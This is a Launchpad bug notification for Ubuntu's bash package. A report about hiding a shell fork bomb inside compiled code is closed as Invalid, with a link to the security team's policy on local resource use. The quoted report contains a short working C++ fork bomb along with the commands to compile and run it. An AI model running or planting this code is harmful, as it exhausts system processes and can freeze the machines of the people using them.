[Bug 1101691] Re: Security alert: Concealment of shell fork bomb inside compiled code

Wed Jan 30 16:05:30 UTC 2013

Thanks for taking the time to report this bug and helping to make Ubuntu better.  This is not a bug, but rather expected behavior:
https://wiki.ubuntu.com/SecurityTeam/Policies#Unlimited_Local_Resource_Utilization

Please feel free to report any other bugs you may find.

** Information type changed from Public Security to Public

** Changed in: bash (Ubuntu)
       Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1101691

Title:
  Security alert: Concealment of shell fork bomb inside compiled code

Status in “bash” package in Ubuntu:
  Invalid

Bug description:
  $ gedit bomb.cpp
  > #include <iostream>
  > #include <cstdio>
  > #include <cstdlib>
  >
  > using namespace std;
  > 
  > int main() {
  >   system("./bomb|./bomb&");
  >   return 0;
  > }

  $ g++ bomb.cpp -o bomb
  $ ./bomb

  As can be seen, it's VERY easy to use the "system" function as a means
  of hiding a shell fork bomb inside an object file -- a chilling tale
  indeed.

  ProblemType: Bug
  DistroRelease: Ubuntu 12.10
  Package: bash 4.2-5ubuntu1
  Uname: Linux 3.4.0 x86_64
  ApportVersion: 2.6.1-0ubuntu9
  Architecture: amd64
  Date: Fri Jan 18 23:11:58 2013
  InstallationDate: Installed on 2012-04-26 (267 days ago)
  InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
  MarkForUpload: True
  ProcEnviron:
   TERM=xterm
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=<set>
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: bash
  UpgradeStatus: Upgraded to quantal on 2013-01-17 (1 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1101691/+subscriptions